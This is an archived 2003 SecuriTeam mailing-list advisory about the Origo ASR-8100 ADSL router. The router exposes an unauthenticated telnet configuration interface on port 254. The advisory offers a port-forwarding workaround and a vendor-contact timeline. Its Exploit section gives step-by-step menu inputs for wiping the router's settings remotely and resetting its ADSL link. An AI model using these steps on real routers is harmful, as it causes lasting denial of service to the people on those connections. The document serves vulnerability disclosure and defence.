[NEWS] Remote Origo ASR-8100 ADSL Reset and Permanent Denial of Service Attack

From: SecuriTeam (support_at_securiteam.com)
Date: 10/23/03

  • Next message: SecuriTeam: "[NT] eMule's Web Control Panel Vulnerable to DoS (Long Password)"
    To: list@securiteam.com
    Date: 23 Oct 2003 17:46:57 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Remote Origo ASR-8100 ADSL Reset and Permanent Denial of Service Attack
    ------------------------------------------------------------------------

    SUMMARY

    The Origo ASR-8100 ADSL device can be remotely reset to factory settings,
    allowing a permanent denial of service attack until it is reconfigured
    manually by an operator. The attack only takes place after the device is
    reset - which may be some time after it has been performed. PPP
    authentication information is lost on reset to factory settings, so it is
    most likely that the device will be unable to establish a WAN link after
    reset.

    The ADSL link can also be remotely reset, causing temporary DoS and (if
    DHCP is used) its IP address to change.

    Both of these do not require any special privileges (no administrative
    password is required).

    DETAILS

    A telnet-style configuration interface is left open to the WAN interface
    on port 254, without any form of protection on it (password protection).

    Workaround:
    Forwarding external port 254 to an internal port that is unused prevents
    access to the configuration interface.

    This can be done via the web interface by going to:
    http://router-ip/doc/advance.htm
    Click on Configuration: Virtual server
    Enter a new entry:
    Public port: 254
    Private port: 9876
    TCP
    Host IP address: 127.0.0.1
    Click 'Add this setting', then do Configuration: Save Settings/Reboot and
    Click 'Save & Reboot'

    Exploit:
    From any Internet connected host:

    telnet <router global IP address> 254
    Returns a menu:
    01/01/99 CONEXANT SYSTEMS, INC.
    00:04:10
                    ATU-R ACCESS RUNNER ADSL TERMINAL (Annex A)
     
    You are prompted for a LOGIN PASSWORD>
    Just press return
    Brings up MAIN MENU
      1. SYSTEM STATUS AND CONFIGURATION
      2. ADSL MENU
      
      4. REMOTE LOGON

    Origo Reset:
    Press 1 - get to SYSTEM STATUS AND CONFIGURATION
      1. SYSTEM INFORMATION
      2. SYSTEM CONFIGURATION

    Press 2 - get to SYSTEM CONFIGURATION
      1. CHANGE SYSTEM TIME
      2. CHANGE SYSTEM DATE
      3. CHANGE PASSWORD
      4. FACTORY DEFAULT CONFIGURATION

    Type 1 hh:mm:ss to reset the system time
    Type 2 dd/mm/yy to reset the system date
    (Option 3 doesn't work)

    Type 4: Prompt: This will reset all the configurations and the ADSL modem.
    Are you sure?(Y/N)

    Type Y: Message: NVRAM updated

    This does not reset the ADSL modem, only clears the NVRAM. This takes
    effect the next time the modem is reset: the admin password is reset to
    that printed in the documentation, and the ADSL username/password are
    reset, meaning the connection is down permanently until a human sets them
    up again. Any other settings (security etc) are also lost.

    ADSL Link Reset:
    From main menu, type 2 to get to ADSL MENU
      1. ADSL PERFORMANCE STATUS
      2. 24 HOUR ADSL PERFORMANCE HISTORY
      3. 7 DAY ADSL PERFORMANCE HISTORY
      4. ADSL ALARM HISTORY
      5. ADSL TRANSCEIVER CONFIGURATION MENU
      6. ADSL LINK RESET

    Type 6: Prompt: This will bring down the ADSL link. Are you sure(Y/N)?
    Type Y. The ADSL link is reset and a new WAN IP address is requested by
    DHCP (if the ISP uses it).

    Vendor Status:
    UK support for Vendor (support@adsltech.com) was notified on 30th August
    2003 - entirety of reply message was 'Thanks a lot'. Vendor does not
    advertise email addresses so were notified via web form on that date - no
    response received. To date the vendor has not advertised any patches or
    new firmware.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:theo_@_markettos.org.uk>
    Theo Markettos.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[NT] eMule's Web Control Panel Vulnerable to DoS (Long Password)"

    Relevant Pages

    • Origo ASR-8100 ADSL router remote factory reset
      ... ADSL Showtime Firmware Version: 3.21 ... Remote ADSL reset and permanent denial of service attack ... A telnet-style configuration interface is left open to WAN interface on port ...
      (Bugtraq)
    • Re: More problems/router settings
      ... Router OK, you can also have a look at the Router's Admin/Status ... to see what it's saying about the state of the ADSL Line. ... need to have the right PPoE/PPPoA Settings & the right VPI & VCI ... By Pressing & *Holding* the ReSet Button at the back of it, ...
      (uk.people.silversurfers)
    • Re: three mini-rants
      ... is instantly fixed by a reset of the ADSL box. ... It may be chipset, ... luser contention. ... This presumably isn't UI as who would use ADSL for proper connectivity?, ...
      (alt.sysadmin.recovery)
    • 2wire Router Bt branded problems
      ... I've used this router for about a week and it's unable to detect the ADSL ... almost immediately I changed the mtu (for a talktalk ADSL connection). ... (Reset to defaults etc, still the same) ...
      (uk.telecom)